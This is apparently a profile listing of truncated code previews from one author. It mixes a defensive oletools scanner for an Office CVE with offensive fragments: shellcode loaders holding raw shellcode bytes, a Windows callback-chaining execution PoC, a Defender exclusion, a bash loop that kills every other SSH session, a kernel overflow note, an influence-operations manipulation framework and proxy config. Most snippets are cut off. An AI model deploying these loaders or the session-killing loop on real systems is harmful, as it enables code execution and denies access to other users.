emdnaia

# script to scan MS Office files, looking for "Shell.Explorer" OLE objects which could match CVE-2026-21509
# using oletools - https://github.com/decalage2/oletools
# Philippe Lagadec 2026-01-28

# NOTES:
# According to the MS advisory https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21509
# the CVE-2026-21509 vulnerability is related to CLSID "EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B",
# corresponding to the "Shell.Explorer" COM object, which can be used to open the legacy
# Internet Explorer engine (aka Trident/MSHTML) from any application.
# So to exploit CVE2026-21509 from a MS Office document, one could use either an OLE object

emdnaia

# ms-block.ps1 - Windows telemetry/AI blocker (idempotent, no dupes)
# Run as Administrator
$hostsPath = "$env:windir\System32\drivers\etc\hosts"
$marker = "# --- MS-BLOCK START ---"
$endMarker = "# --- MS-BLOCK END ---"

# Exclude hosts file from Defender
Add-MpPreference -ExclusionPath $hostsPath -ErrorAction SilentlyContinue

# Read current hosts, strip any previous MS-BLOCK section

emdnaia

/*
 * Callback Chaining PoC - Windows API Callback Chain Execution
 */

#include <Windows.h>
#include <dbghelp.h>
#include <powrprof.h>
#include <stdio.h>

#pragma comment(lib, "user32.lib")

emdnaia

Psychological Manipulation Pipeline: A Scientifically Validated Framework

Context

Reference: https://x.com/Daractenus/status/2006666543669887158 This document analyzes the psychological mechanisms exploited in influence operations, with specific reference to AI-generated disinformation campaigns (e.g., Russian bot networks deploying AI-generated "Polish women" demanding EU exit). The framework synthesizes peer-reviewed research from cognitive psychology, social psychology, and behavioral science.

---

Phase 1: Target Identification & Profiling

emdnaia

5 min POC inspired by https://x.com/IceSolst/status/1986764951940124676?s=20

# Install MariaDB
sudo dnf install mariadb-server mariadb -y

# Start and enable service
sudo systemctl start mariadb
sudo systemctl enable mariadb

emdnaia

/* 

## File Descriptor INT_MAX Overflow
----
- Info:

Tweet: https://x.com/spendergrsec/status/1958264076162998771

Ref: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=04a2c4b4511d186b0fce685da21085a5d4acd370

emdnaia

MY_TTY=$(tty | sed 's/\/dev\///')
MY_SESSION_PIDS=$(ps aux | grep "sshd-session.*$MY_TTY" | awk '{print $2}' | tr '\n' '|' | sed 's/|$//')

echo "Protecting PIDs: $MY_SESSION_PIDS"

while true; do
    ps aux | grep 'sshd-session' | grep -v grep | grep -v '\[listener\]' | awk '{print $2}' | grep -vE "^($MY_SESSION_PIDS)$" | xargs -r kill -9 2>/dev/null
    sleep 0.01  # Check every 10ms - way faster
done

emdnaia

#include <windows.h>
#include <wininet.h>
#include <stdio.h>

#pragma comment(lib, "wininet.lib")

// notepad.exe shellcode
char shellcode[] =  {
    0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,
    0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52,

emdnaia

#include <stdio.h>
#include <windows.h>

// Shellcode template from: https://gist.github.com/kkent030315/b508e56a5cb0e3577908484fa4978f12
// Compile using: x86_64-w64-mingw32-gcc -m64 enclave.c -o enclace.exe -lntdll

EXTERN_C NTSYSAPI
NTSTATUS
NTAPI LdrCallEnclave(
	_In_ PENCLAVE_ROUTINE Routine,

emdnaia

stream {
        map $ssl_preread_server_name $singbox {
                trojan.example.com trojan;
                trojan-ws.example.com trojan-ws;
                trojan-ws-6.example.com trojan-ws-6;
                vmess.example.com vmess;
                vmess-ws.example.com vmess-ws;
                vmess-ws-6.example.com vmess-ws-6;
        }
        upstream trojan {